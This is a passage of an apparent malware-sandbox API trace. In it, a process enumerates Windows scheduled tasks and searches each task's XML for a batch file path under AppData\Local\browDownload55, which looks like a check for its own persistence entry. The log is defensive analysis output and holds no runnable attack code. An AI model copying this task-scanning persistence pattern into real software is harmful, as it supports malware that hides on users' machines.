(This=0x929470) returned 0x0 [0162.373] ITaskFolder:GetFolders (in: This=0x9293a0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x929470) returned 0x0 [0162.373] ITaskFolderCollection:get_Count (in: This=0x929470, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0162.373] IUnknown:Release (This=0x929470) returned 0x0 [0162.373] TaskScheduler:IUnknown:Release (This=0x9293a0) returned 0x0 [0162.373] ITaskFolderCollection:get_Item (in: This=0x929220, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x18, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9293a0) returned 0x0 [0162.374] ITaskFolder:GetTasks (in: This=0x9293a0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x929470) returned 0x0 [0162.374] IRegisteredTaskCollection:get_Count (in: This=0x929470, pCount=0xce048 | out: pCount=0xce048*=2) returned 0x0 [0162.374] IRegisteredTaskCollection:get_Item (in: This=0x929470, index=0xce098*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x9295f0) returned 0x0 [0162.374] IRegisteredTask:get_Name (in: This=0x9295f0, pName=0xce058 | out: pName=0xce058*="EnableErrorDetailsUpdate") returned 0x0 [0162.374] IRegisteredTask:get_Xml (in: This=0x9295f0, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n $(@%SystemRoot%\\system32\\ErrorDetailsUpdate.dll,-600)\r\n $(@%SystemRoot%\\system32\\ErrorDetailsUpdate.dll,-601)\r\n \\Microsoft\\Windows\\ErrorDetails\\EnableErrorDetailsUpdate\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n false\r\n PT1M\r\n IgnoreNew\r\n 6\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 7508BCA33E1B9611\r\n \r\n \r\n \r\n \r\n {FE285C8C-5360-41C1-A700-045501C740DE}\r\n \r\n \r\n") returned 0x0 [0162.375] StrStrIW (lpFirst="\r\n\r\n \r\n $(@%SystemRoot%\\system32\\ErrorDetailsUpdate.dll,-600)\r\n $(@%SystemRoot%\\system32\\ErrorDetailsUpdate.dll,-601)\r\n \\Microsoft\\Windows\\ErrorDetails\\EnableErrorDetailsUpdate\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n false\r\n PT1M\r\n IgnoreNew\r\n 6\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 7508BCA33E1B9611\r\n \r\n \r\n \r\n \r\n {FE285C8C-5360-41C1-A700-045501C740DE}\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0162.375] IUnknown:Release (This=0x9295f0) returned 0x0 [0162.375] IRegisteredTaskCollection:get_Item (in: This=0x929470, index=0xce098*(varType=0x3, wReserved1=0x3335, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x9295f0) returned 0x0 [0162.375] IRegisteredTask:get_Name (in: This=0x9295f0, pName=0xce058 | out: pName=0xce058*="ErrorDetailsUpdate") returned 0x0 [0162.375] IRegisteredTask:get_Xml (in: This=0x9295f0, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n $(@%systemroot%\\system32\\ErrorDetailsUpdate.dll,-600)\r\n $(@%SystemRoot%\\system32\\ErrorDetailsUpdate.dll,-601)\r\n \\Microsoft\\Windows\\ErrorDetails\\ErrorDetailsUpdate\r\n \r\n \r\n \r\n S-1-5-20\r\n \r\n \r\n \r\n true\r\n true\r\n false\r\n PT5M\r\n IgnoreNew\r\n \r\n 3\r\n PT2H\r\n \r\n true\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n P14D\r\n \r\n \r\n \r\n \r\n \r\n {9CDA66BE-3271-4723-8D35-DD834C58AD92}\r\n \r\n \r\n") returned 0x0 [0162.376] StrStrIW (lpFirst="\r\n\r\n \r\n $(@%systemroot%\\system32\\ErrorDetailsUpdate.dll,-600)\r\n $(@%SystemRoot%\\system32\\ErrorDetailsUpdate.dll,-601)\r\n \\Microsoft\\Windows\\ErrorDetails\\ErrorDetailsUpdate\r\n \r\n \r\n \r\n S-1-5-20\r\n \r\n \r\n \r\n true\r\n true\r\n false\r\n PT5M\r\n IgnoreNew\r\n \r\n 3\r\n PT2H\r\n \r\n true\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n P14D\r\n \r\n \r\n \r\n \r\n \r\n {9CDA66BE-3271-4723-8D35-DD834C58AD92}\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0162.376] IUnknown:Release (This=0x9295f0) returned 0x0 [0162.376] IUnknown:Release (This=0x929470) returned 0x0 [0162.376] ITaskFolder:GetFolders (in: This=0x9293a0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x929470) returned 0x0 [0162.377] ITaskFolderCollection:get_Count (in: This=0x929470, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0162.377] IUnknown:Release (This=0x929470) returned 0x0 [0162.377] TaskScheduler:IUnknown:Release (This=0x9293a0) returned 0x0 [0162.377] ITaskFolderCollection:get_Item (in: This=0x929220, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x19, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9293a0) returned 0x0 [0162.377] ITaskFolder:GetTasks (in: This=0x9293a0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x929460) returned 0x0 [0162.377] IRegisteredTaskCollection:get_Count (in: This=0x929460, pCount=0xce048 | out: pCount=0xce048*=0) returned 0x0 [0162.377] IUnknown:Release (This=0x929460) returned 0x0 [0162.377] ITaskFolder:GetFolders (in: This=0x9293a0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x929460) returned 0x0 [0162.377] ITaskFolderCollection:get_Count (in: This=0x929460, pCount=0xce044 | out: pCount=0xce044*=1) returned 0x0 [0162.378] ITaskFolderCollection:get_Item (in: This=0x929460, index=0xce080*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppFolder=0xce030 | out: ppFolder=0xce030*=0x9295f0) returned 0x0 [0162.378] ITaskFolder:GetTasks (in: This=0x9295f0, flags=1, ppTasks=0xcdea0 | out: ppTasks=0xcdea0*=0x9296c0) returned 0x0 [0162.378] IRegisteredTaskCollection:get_Count (in: This=0x9296c0, pCount=0xcde98 | out: pCount=0xcde98*=1) returned 0x0 [0162.378] IRegisteredTaskCollection:get_Item (in: This=0x9296c0, index=0xcdee8*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0xcde88 | out: ppRegisteredTask=0xcde88*=0x929850) returned 0x0 [0162.378] IRegisteredTask:get_Name (in: This=0x929850, pName=0xcdea8 | out: pName=0xcdea8*="DmClient") returned 0x0 [0162.378] IRegisteredTask:get_Xml (in: This=0x929850, pXml=0xcde80 | out: pXml=0xcde80*="\r\n\r\n \r\n $(@%systemRoot%\\system32\\dmclient.exe,-201)\r\n $(@%systemRoot%\\system32\\dmclient.exe,-200)\r\n $(@%systemRoot%\\system32\\dmclient.exe,-202)\r\n \\Microsoft\\Windows\\Feedback\\Siuf\\DmClient\r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n PT5M\r\n IgnoreNew\r\n true\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n P1D\r\n P3D\r\n \r\n \r\n \r\n \r\n \r\n %windir%\\system32\\dmclient.exe\r\n \r\n \r\n") returned 0x0 [0162.379] StrStrIW (lpFirst="\r\n\r\n \r\n $(@%systemRoot%\\system32\\dmclient.exe,-201)\r\n $(@%systemRoot%\\system32\\dmclient.exe,-200)\r\n $(@%systemRoot%\\system32\\dmclient.exe,-202)\r\n \\Microsoft\\Windows\\Feedback\\Siuf\\DmClient\r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n PT5M\r\n IgnoreNew\r\n true\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n P1D\r\n P3D\r\n \r\n \r\n \r\n \r\n \r\n %windir%\\system32\\dmclient.exe\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0162.379] IUnknown:Release (This=0x929850) returned 0x0 [0162.379] IUnknown:Release (This=0x9296c0) returned 0x0 [0162.379] ITaskFolder:GetFolders (in: This=0x9295f0, flags=0, ppFolders=0xcde88 | out: ppFolders=0xcde88*=0x9296c0) returned 0x0 [0162.379] ITaskFolderCollection:get_Count (in: This=0x9296c0, pCount=0xcde94 | out: pCount=0xcde94*=0) returned 0x0 [0162.379] IUnknown:Release (This=0x9296c0) returned 0x0 [0162.379] TaskScheduler:IUnknown:Release (This=0x9295f0) returned 0x0 [0162.379] IUnknown:Release (This=0x929460) returned 0x0 [0162.379] TaskScheduler:IUnknown:Release (This=0x9293a0) returned 0x0 [0162.379] ITaskFolderCollection:get_Item (in: This=0x929220, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1a, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9293a0) returned 0x0 [0162.379] ITaskFolder:GetTasks (in: This=0x9293a0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x9294a0) returned 0x0 [0162.380] IRegisteredTaskCollection:get_Count (in: This=0x9294a0, pCount=0xce048 | out: pCount=0xce048*=1) returned 0x0 [0162.380] IRegisteredTaskCollection:get_Item (in: This=0x9294a0, index=0xce098*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929650) returned 0x0 [0162.380] IRegisteredTask:get_Name (in: This=0x929650, pName=0xce058 | out: pName=0xce058*="Property Definition Sync") returned 0x0 [0162.380] IRegisteredTask:get_Xml (in: This=0x929650, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n D:(D;;SD;;;AU)(A;;FRFWFX;;;AU)\r\n $(@%systemroot%\\system32\\srm.dll,-18000)\r\n $(@%systemroot%\\system32\\srm.dll,-18001)\r\n $(@%systemroot%\\system32\\srm.dll,-18002)\r\n \\Microsoft\\Windows\\File Classification Infrastructure\\Property Definition Sync\r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n PT5M\r\n IgnoreNew\r\n true\r\n true\r\n \r\n PT1M\r\n PT1M\r\n false\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 2006-11-09T03:00:00\r\n PT4H\r\n \r\n 1\r\n \r\n \r\n \r\n \r\n \r\n {2AE64751-B728-4D6B-97A0-B2DA2E7D2A3B}\r\n \r\n \r\n") returned 0x0 [0162.381] StrStrIW (lpFirst="\r\n\r\n \r\n D:(D;;SD;;;AU)(A;;FRFWFX;;;AU)\r\n $(@%systemroot%\\system32\\srm.dll,-18000)\r\n $(@%systemroot%\\system32\\srm.dll,-18001)\r\n $(@%systemroot%\\system32\\srm.dll,-18002)\r\n \\Microsoft\\Windows\\File Classification Infrastructure\\Property Definition Sync\r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n PT5M\r\n IgnoreNew\r\n true\r\n true\r\n \r\n PT1M\r\n PT1M\r\n false\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 2006-11-09T03:00:00\r\n PT4H\r\n \r\n 1\r\n \r\n \r\n \r\n \r\n \r\n {2AE64751-B728-4D6B-97A0-B2DA2E7D2A3B}\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0162.381] IUnknown:Release (This=0x929650) returned 0x0 [0162.381] IUnknown:Release (This=0x9294a0) returned 0x0 [0162.381] ITaskFolder:GetFolders (in: This=0x9293a0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x9294a0) returned 0x0 [0162.381] ITaskFolderCollection:get_Count (in: This=0x9294a0, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0162.381] IUnknown:Release (This=0x9294a0) returned 0x0 [0162.381] TaskScheduler:IUnknown:Release (This=0x9293a0) returned 0x0 [0162.381] ITaskFolderCollection:get_Item (in: This=0x929220, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1b, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9293a0) returned 0x0 [0162.381] ITaskFolder:GetTasks (in: This=0x9293a0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x929470) returned 0x0 [0162.382] IRegisteredTaskCollection:get_Count (in: This=0x929470, pCount=0xce048 | out: pCount=0xce048*=1) returned 0x0 [0162.382] IRegisteredTaskCollection:get_Item (in: This=0x929470, index=0xce098*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x9295f0) returned 0x0 [0162.382] IRegisteredTask:get_Name (in: This=0x9295f0, pName=0xce058 | out: pName=0xce058*="File History (maintenance mode)") returned 0x0 [0162.382] IRegisteredTask:get_Xml (in: This=0x9295f0, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n 1.0\r\n 2010-08-12T00:00:00\r\n D:(A;OICI;FA;;;BA)(A;OICI;FA;;;SY)(A;OICI;FRFX;;;LS)(A;OICI;FRFX;;;AU)\r\n $(@%systemRoot%\\system32\\fhtask.dll,-200)\r\n $(@%systemRoot%\\system32\\fhtask.dll,-201)\r\n $(@%systemRoot%\\system32\\fhtask.dll,-202)\r\n \\Microsoft\\Windows\\FileHistory\\File History (maintenance mode)\r\n \r\n \r\n \r\n S-1-5-19\r\n \r\n \r\n \r\n true\r\n true\r\n PT0S\r\n IgnoreNew\r\n \r\n false\r\n false\r\n \r\n true\r\n \r\n P3D\r\n P7D\r\n \r\n \r\n \r\n \r\n \r\n {89917B7C-A1A6-11DF-8BF6-18A90531A85A}\r\n \r\n \r\n") returned 0x0 [0162.382] StrStrIW (lpFirst="\r\n\r\n \r\n 1.0\r\n 2010-08-12T00:00:00\r\n D:(A;OICI;FA;;;BA)(A;OICI;FA;;;SY)(A;OICI;FRFX;;;LS)(A;OICI;FRFX;;;AU)\r\n $(@%systemRoot%\\system32\\fhtask.dll,-200)\r\n $(@%systemRoot%\\system32\\fhtask.dll,-201)\r\n $(@%systemRoot%\\system32\\fhtask.dll,-202)\r\n \\Microsoft\\Windows\\FileHistory\\File History (maintenance mode)\r\n \r\n \r\n \r\n S-1-5-19\r\n \r\n \r\n \r\n true\r\n true\r\n PT0S\r\n IgnoreNew\r\n \r\n false\r\n false\r\n \r\n true\r\n \r\n P3D\r\n P7D\r\n \r\n \r\n \r\n \r\n \r\n {89917B7C-A1A6-11DF-8BF6-18A90531A85A}\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0162.383] IUnknown:Release (This=0x9295f0) returned 0x0 [0162.383] IUnknown:Release (This=0x929470) returned 0x0 [0162.383] ITaskFolder:GetFolders (in: This=0x9293a0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x929470) returned 0x0 [0162.383] ITaskFolderCollection:get_Count (in: This=0x929470, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0162.383] IUnknown:Release (This=0x929470) returned 0x0 [0162.383] TaskScheduler:IUnknown:Release (This=0x9293a0) returned 0x0 [0162.383] ITaskFolderCollection:get_Item (in: This=0x929220, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1c, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9293a0) returned 0x0 [0162.383] ITaskFolder:GetTasks (in: This=0x9293a0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x929490) returned 0x0 [0162.383] IRegisteredTaskCollection:get_Count (in: This=0x929490, pCount=0xce048 | out: pCount=0xce048*=2) returned 0x0 [0162.384] IRegisteredTaskCollection:get_Item (in: This=0x929490, index=0xce098*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929630) returned 0x0 [0162.384] IRegisteredTask:get_Name (in: This=0x929630, pName=0xce058 | out: pName=0xce058*="Installation") returned 0x0 [0162.384] IRegisteredTask:get_Xml (in: This=0x929630, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n D:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;IU)\r\n $(@%systemRoot%\\System32\\LanguageComponentsInstaller.Dll,-601)\r\n $(@%systemRoot%\\System32\\LanguageComponentsInstaller.Dll,-600)\r\n $(@%systemRoot%\\System32\\LanguageComponentsInstaller.Dll,-602)\r\n \\Microsoft\\Windows\\LanguageComponentsInstaller\\Installation\r\n \r\n \r\n \r\n S-1-5-4\r\n \r\n \r\n \r\n true\r\n false\r\n PT1H\r\n Queue\r\n true\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n PT15M\r\n \r\n P1D\r\n \r\n \r\n \r\n \r\n \r\n \r\n {6F58F65F-EC0E-4ACA-99FE-FC5A1A25E4BE}\r\n \r\n \r\n \r\n") returned 0x0 [0162.384] StrStrIW (lpFirst="\r\n\r\n \r\n D:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;IU)\r\n $(@%systemRoot%\\System32\\LanguageComponentsInstaller.Dll,-601)\r\n $(@%systemRoot%\\System32\\LanguageComponentsInstaller.Dll,-600)\r\n $(@%systemRoot%\\System32\\LanguageComponentsInstaller.Dll,-602)\r\n \\Microsoft\\Windows\\LanguageComponentsInstaller\\Installation\r\n \r\n \r\n \r\n S-1-5-4\r\n \r\n \r\n \r\n true\r\n false\r\n PT1H\r\n Queue\r\n true\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n PT15M\r\n \r\n P1D\r\n \r\n \r\n \r\n \r\n \r\n \r\n {6F58F65F-EC0E-4ACA-99FE-FC5A1A25E4BE}\r\n \r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0162.384] IUnknown:Release (This=0x929630) returned 0x0 [0162.384] IRegisteredTaskCollection:get_Item (in: This=0x929490, index=0xce098*(varType=0x3, wReserved1=0x3335, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929630) returned 0x0 [0162.384] IRegisteredTask:get_Name (in: This=0x929630, pName=0xce058 | out: pName=0xce058*="Uninstallation") returned 0x0 [0162.385] IRegisteredTask:get_Xml (in: This=0x929630, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n D:P(A;;FA;;;BA)(A;;FA;;;SY)\r\n $(@%systemRoot%\\System32\\LanguageComponentsInstaller.Dll,-601)\r\n $(@%systemRoot%\\System32\\LanguageComponentsInstaller.Dll,-600)\r\n $(@%systemRoot%\\System32\\LanguageComponentsInstaller.Dll,-603)\r\n \\Microsoft\\Windows\\LanguageComponentsInstaller\\Uninstallation\r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n true\r\n false\r\n false\r\n PT1H\r\n Queue\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n P7D\r\n P14D\r\n \r\n \r\n \r\n \r\n \r\n {6F58F65F-EC0E-4ACA-99FE-FC5A1A25E4BE}\r\n \r\n \r\n \r\n") returned 0x0 [0162.385] StrStrIW (lpFirst="\r\n\r\n \r\n D:P(A;;FA;;;BA)(A;;FA;;;SY)\r\n $(@%systemRoot%\\System32\\LanguageComponentsInstaller.Dll,-601)\r\n $(@%systemRoot%\\System32\\LanguageComponentsInstaller.Dll,-600)\r\n $(@%systemRoot%\\System32\\LanguageComponentsInstaller.Dll,-603)\r\n \\Microsoft\\Windows\\LanguageComponentsInstaller\\Uninstallation\r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n true\r\n false\r\n false\r\n PT1H\r\n Queue\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n P7D\r\n P14D\r\n \r\n \r\n \r\n \r\n \r\n {6F58F65F-EC0E-4ACA-99FE-FC5A1A25E4BE}\r\n \r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0162.385] IUnknown:Release (This=0x929630) returned 0x0 [0162.385] IUnknown:Release (This=0x929490) returned 0x0 [0162.385] ITaskFolder:GetFolders (in: This=0x9293a0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x929490) returned 0x0 [0162.386] ITaskFolderCollection:get_Count (in: This=0x929490, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0162.386] IUnknown:Release (This=0x929490) returned 0x0 [0162.386] TaskScheduler:IUnknown:Release (This=0x9293a0) returned 0x0 [0162.386] ITaskFolderCollection:get_Item (in: This=0x929220, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1d, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9293a0) returned 0x0 [0162.386] ITaskFolder:GetTasks (in: This=0x9293a0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x929470) returned 0x0 [0162.386] IRegisteredTaskCollection:get_Count (in: This=0x929470, pCount=0xce048 | out: pCount=0xce048*=1) returned 0x0 [0162.386] IRegisteredTaskCollection:get_Item (in: This=0x929470, index=0xce098*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929600) returned 0x0 [0162.386] IRegisteredTask:get_Name (in: This=0x929600, pName=0xce058 | out: pName=0xce058*="TempSignedLicenseExchange") returned 0x0 [0162.386] IRegisteredTask:get_Xml (in: This=0x929600, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n 1.0\r\n D:P(A;;FA;;;SY)(A;;FA;;;BA)(A;;GRGX;;;SU)\r\n $(@%SystemRoot%\\system32\\TempSignedLicenseExchangeTask.dll,-601)\r\n $(@%SystemRoot%\\system32\\TempSignedLicenseExchangeTask.dll,-600)\r\n $(@%SystemRoot%\\system32\\TempSignedLicenseExchangeTask.dll,-602)\r\n \\Microsoft\\Windows\\License Manager\\TempSignedLicenseExchange\r\n \r\n \r\n \r\n S-1-5-4\r\n HighestAvailable\r\n \r\n \r\n \r\n false\r\n false\r\n true\r\n IgnoreNew\r\n true\r\n true\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n P1D\r\n P7D\r\n \r\n \r\n \r\n \r\n \r\n {77646A68-AD14-4D53-897D-7BE4DDE5F929}\r\n \r\n \r\n") returned 0x0 [0162.387] StrStrIW (lpFirst="\r\n\r\n \r\n 1.0\r\n D:P(A;;FA;;;SY)(A;;FA;;;BA)(A;;GRGX;;;SU)\r\n $(@%SystemRoot%\\system32\\TempSignedLicenseExchangeTask.dll,-601)\r\n $(@%SystemRoot%\\system32\\TempSignedLicenseExchangeTask.dll,-600)\r\n $(@%SystemRoot%\\system32\\TempSignedLicenseExchangeTask.dll,-602)\r\n \\Microsoft\\Windows\\License Manager\\TempSignedLicenseExchange\r\n \r\n \r\n \r\n S-1-5-4\r\n HighestAvailable\r\n \r\n \r\n \r\n false\r\n false\r\n true\r\n IgnoreNew\r\n true\r\n true\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n P1D\r\n P7D\r\n \r\n \r\n \r\n \r\n \r\n {77646A68-AD14-4D53-897D-7BE4DDE5F929}\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0162.387] IUnknown:Release (This=0x929600) returned 0x0 [0162.387] IUnknown:Release (This=0x929470) returned 0x0 [0162.387] ITaskFolder:GetFolders (in: This=0x9293a0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x929470) returned 0x0 [0162.387] ITaskFolderCollection:get_Count (in: This=0x929470, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0162.387] IUnknown:Release (This=0x929470) returned 0x0 [0162.387] TaskScheduler:IUnknown:Release (This=0x9293a0) returned 0x0 [0162.387] ITaskFolderCollection:get_Item (in: This=0x929220, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1e, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9293a0) returned 0x0 [0162.387] ITaskFolder:GetTasks (in: This=0x9293a0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x929460) returned 0x0 [0162.388] IRegisteredTaskCollection:get_Count (in: This=0x929460, pCount=0xce048 | out: pCount=0xce048*=0) returned 0x0 [0162.388] IUnknown:Release (This=0x929460) returned 0x0 [0162.388] ITaskFolder:GetFolders (in: This=0x9293a0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x929460) returned 0x0 [0162.388] ITaskFolderCollection:get_Count (in: This=0x929460, pCount=0xce044 | out: pCount=0xce044*=1) returned 0x0 [0162.388] ITaskFolderCollection:get_Item (in: This=0x929460, index=0xce080*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppFolder=0xce030 | out: ppFolder=0xce030*=0x9295e0) returned 0x0 [0162.388] ITaskFolder:GetTasks (in: This=0x9295e0, flags=1, ppTasks=0xcdea0 | out: ppTasks=0xcdea0*=0x9296b0) returned 0x0 [0162.389] IRegisteredTaskCollection:get_Count (in: This=0x9296b0, pCount=0xcde98 | out: pCount=0xcde98*=0) returned 0x0 [0162.389] IUnknown:Release (This=0x9296b0) returned 0x0 [0162.389] ITaskFolder:GetFolders (in: This=0x9295e0, flags=0, ppFolders=0xcde88 | out: ppFolders=0xcde88*=0x9296b0) returned 0x0 [0162.389] ITaskFolderCollection:get_Count (in: This=0x9296b0, pCount=0xcde94 | out: pCount=0xcde94*=0) returned 0x0 [0162.389] IUnknown:Release (This=0x9296b0) returned 0x0 [0162.389] TaskScheduler:IUnknown:Release (This=0x9295e0) returned 0x0 [0162.389] IUnknown:Release (This=0x929460) returned 0x0 [0162.389] TaskScheduler:IUnknown:Release (This=0x9293a0) returned 0x0 [0162.389] ITaskFolderCollection:get_Item (in: This=0x929220, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1f, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9293a0) returned 0x0 [0162.390] ITaskFolder:GetTasks (in: This=0x9293a0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x929460) returned 0x0 [0162.390] IRegisteredTaskCollection:get_Count (in: This=0x929460, pCount=0xce048 | out: pCount=0xce048*=2) returned 0x0 [0162.390] IRegisteredTaskCollection:get_Item (in: This=0x929460, index=0xce098*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x9295e0) returned 0x0 [0162.390] IRegisteredTask:get_Name (in: This=0x9295e0, pName=0xce058 | out: pName=0xce058*="Notifications") returned 0x0 [0162.390] IRegisteredTask:get_Xml (in: This=0x9295e0, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n 1.3\r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;AU)\r\n $(@%systemRoot%\\system32\\LocationNotificationWindows.exe,-102)\r\n \\Microsoft\\Windows\\Location\\Notifications\r\n \r\n \r\n \r\n S-1-5-11\r\n \r\n \r\n \r\n false\r\n false\r\n PT0S\r\n Parallel\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 7508BCA321089541\r\n 01\r\n \r\n \r\n \r\n \r\n %windir%\\System32\\LocationNotificationWindows.exe\r\n \r\n \r\n") returned 0x0 [0162.391] StrStrIW (lpFirst="\r\n\r\n \r\n 1.3\r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;AU)\r\n $(@%systemRoot%\\system32\\LocationNotificationWindows.exe,-102)\r\n \\Microsoft\\Windows\\Location\\Notifications\r\n \r\n \r\n \r\n S-1-5-11\r\n \r\n \r\n \r\n false\r\n false\r\n PT0S\r\n Parallel\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 7508BCA321089541\r\n 01\r\n \r\n \r\n \r\n 